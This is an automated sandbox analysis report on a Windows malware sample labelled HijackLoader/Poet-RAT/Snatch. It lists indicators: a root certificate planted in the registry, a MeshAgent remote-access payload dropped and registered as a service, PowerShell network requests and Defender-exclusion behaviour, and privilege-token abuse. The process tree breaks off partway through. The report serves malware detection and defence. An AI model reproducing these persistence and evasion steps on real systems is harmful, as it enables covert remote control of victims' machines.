Analysis
-
max time kernel
94s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 22:46
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
Resource
win7-20240903-en
General
-
Target
2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
-
Size
19.0MB
-
MD5
c48e8edc68378461a358bf76afb2cb50
-
SHA1
1457f5eda579ad7b4772e16378e1d6de312b66c3
-
SHA256
eae7ea70c95f35b473b9ae7cba6079b6b26d15f4c7167d7119ed4cb0afd7880b
-
SHA512
77a90eac1d5ab5d59a3c6b0ed8d3700edbfd6096b4c6fa8b03f8802b22234cc384aa7f58b115435629649655fac4144e6d78aaa21e68e2e930e09214b9885bd4
-
SSDEEP
196608:XDfS4aFBcMkZbmna1cCwvylAjWZ0Xq9YLuxMfCVb2:faF/CinaqtvylAjWZ0Xq9YLuxMfCVb2
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 21 1308 powershell.exe 23 1308 powershell.exe 24 1308 powershell.exe 26 1308 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 376 powershell.exe 1272 powershell.exe 3908 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 2 IoCs
Processes:
naver.exenaver.exepid process 4776 naver.exe 2804 naver.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 64 IoCs
Processes:
naver.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ADA331FC360B85096B3D4FAF288FDD1D04FB7A14 naver.exe File opened for modification C:\Windows\System32\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\win32u.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\combase.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\ole32.pdb naver.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\7C06307051CE49A02C8C573D5C09C3B54155978E naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\0F4A5A7334D662892CB618A9EE12A94795B8204D naver.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\dll\combase.pdb naver.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716916123641421" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Processes:
2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsedge.exepid process 1984 powershell.exe 1984 powershell.exe 1308 powershell.exe 376 powershell.exe 1308 powershell.exe 376 powershell.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe 4964 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsedge.exemsedge.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 1984 powershell.exe Token: SeIncreaseQuotaPrivilege 1984 powershell.exe Token: SeSecurityPrivilege 1984 powershell.exe Token: SeTakeOwnershipPrivilege 1984 powershell.exe Token: SeLoadDriverPrivilege 1984 powershell.exe Token: SeSystemProfilePrivilege 1984 powershell.exe Token: SeSystemtimePrivilege 1984 powershell.exe Token: SeProfSingleProcessPrivilege 1984 powershell.exe Token: SeIncBasePriorityPrivilege 1984 powershell.exe Token: SeCreatePagefilePrivilege 1984 powershell.exe Token: SeBackupPrivilege 1984 powershell.exe Token: SeRestorePrivilege 1984 powershell.exe Token: SeShutdownPrivilege 1984 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeSystemEnvironmentPrivilege 1984 powershell.exe Token: SeRemoteShutdownPrivilege 1984 powershell.exe Token: SeUndockPrivilege 1984 powershell.exe Token: SeManageVolumePrivilege 1984 powershell.exe Token: 33 1984 powershell.exe Token: 34 1984 powershell.exe Token: 35 1984 powershell.exe Token: 36 1984 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 376 powershell.exe Token: SeDebugPrivilege 4964 msedge.exe Token: SeDebugPrivilege 2812 msedge.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4664 wmic.exe Token: SeIncreaseQuotaPrivilege 4664 wmic.exe Token: SeSecurityPrivilege 4664 wmic.exe Token: SeTakeOwnershipPrivilege 4664 wmic.exe Token: SeLoadDriverPrivilege 4664 wmic.exe Token: SeSystemtimePrivilege 4664 wmic.exe Token: SeBackupPrivilege 4664 wmic.exe Token: SeRestorePrivilege 4664 wmic.exe Token: SeShutdownPrivilege 4664 wmic.exe Token: SeSystemEnvironmentPrivilege 4664 wmic.exe Token: SeUndockPrivilege 4664 wmic.exe Token: SeManageVolumePrivilege 4664 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4664 wmic.exe Token: SeIncreaseQuotaPrivilege 4664 wmic.exe Token: SeSecurityPrivilege 4664 wmic.exe Token: SeTakeOwnershipPrivilege 4664 wmic.exe Token: SeLoadDriverPrivilege 4664 wmic.exe Token: SeSystemtimePrivilege 4664 wmic.exe Token: SeBackupPrivilege 4664 wmic.exe Token: SeRestorePrivilege 4664 wmic.exe Token: SeShutdownPrivilege 4664 wmic.exe Token: SeSystemEnvironmentPrivilege 4664 wmic.exe Token: SeUndockPrivilege 4664 wmic.exe Token: SeManageVolumePrivilege 4664 wmic.exe Token: SeAssignPrimaryTokenPrivilege 3992 wmic.exe Token: SeIncreaseQuotaPrivilege 3992 wmic.exe Token: SeSecurityPrivilege 3992 wmic.exe Token: SeTakeOwnershipPrivilege 3992 wmic.exe Token: SeLoadDriverPrivilege 3992 wmic.exe Token: SeSystemtimePrivilege 3992 wmic.exe Token: SeBackupPrivilege 3992 wmic.exe Token: SeRestorePrivilege 3992 wmic.exe Token: SeShutdownPrivilege 3992 wmic.exe Token: SeSystemEnvironmentPrivilege 3992 wmic.exe Token: SeUndockPrivilege 3992 wmic.exe Token: SeManageVolumePrivilege 3992 wmic.exe Token: SeAssignPrimaryTokenPrivilege 3992 wmic.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exepowershell.exemsedge.exemsedge.exenaver.exedescription pid process target process PID 4988 wrote to memory of 1984 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 4988 wrote to memory of 1984 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 4988 wrote to memory of 1308 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 4988 wrote to memory of 1308 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 4988 wrote to memory of 376 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 4988 wrote to memory of 376 4988 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe powershell.exe PID 1308 wrote to memory of 4964 1308 powershell.exe msedge.exe PID 1308 wrote to memory of 4964 1308 powershell.exe msedge.exe PID 1308 wrote to memory of 4964 1308 powershell.exe msedge.exe PID 1308 wrote to memory of 4964 1308 powershell.exe msedge.exe PID 4964 wrote to memory of 2812 4964 msedge.exe msedge.exe PID 4964 wrote to memory of 2812 4964 msedge.exe msedge.exe PID 4964 wrote to memory of 2812 4964 msedge.exe msedge.exe PID 4964 wrote to memory of 2812 4964 msedge.exe msedge.exe PID 2812 wrote to memory of 1272 2812 msedge.exe powershell.exe PID 2812 wrote to memory of 1272 2812 msedge.exe powershell.exe PID 2812 wrote to memory of 4776 2812 msedge.exe naver.exe PID 2812 wrote to memory of 4776 2812 msedge.exe naver.exe PID 2804 wrote to memory of 4664 2804 naver.exe wmic.exe PID 2804 wrote to memory of 4664 2804 naver.exe wmic.exe PID 2804 wrote to memory of 3992 2804 naver.exe wmic.exe PID 2804 wrote to memory of 3992 2804 naver.exe wmic.exe PID 2804 wrote to memory of 4196 2804 naver.exe wmic.exe PID 2804 wrote to memory of 4196 2804 naver.exe wmic.exe PID 2804 wrote to memory of 1368 2804 naver.exe wmic.exe PID 2804 wrote to memory of 1368 2804 naver.exe wmic.exe PID 2804 wrote to memory of 2316 2804 naver.exe wmic.exe PID 2804 wrote to memory of 2316 2804 naver.exe wmic.exe PID 2804 wrote to memory of 4512 2804 naver.exe wmic.exe PID 2804 wrote to memory of 4512 2804 naver.exe wmic.exe PID 2804 wrote to memory of 3908 2804 naver.exe powershell.exe PID 2804 wrote to memory of 3908 2804 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell " # chcp 65001 > $null; # <-- not working; [Console]::OutputEncoding = [Text.Encoding]::UTF8; # 👈 add this at begin; Get-NetAdapter | foreach { $_ | Select-Object -Property ifAlias, InstanceID } | ConvertTo-Json"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
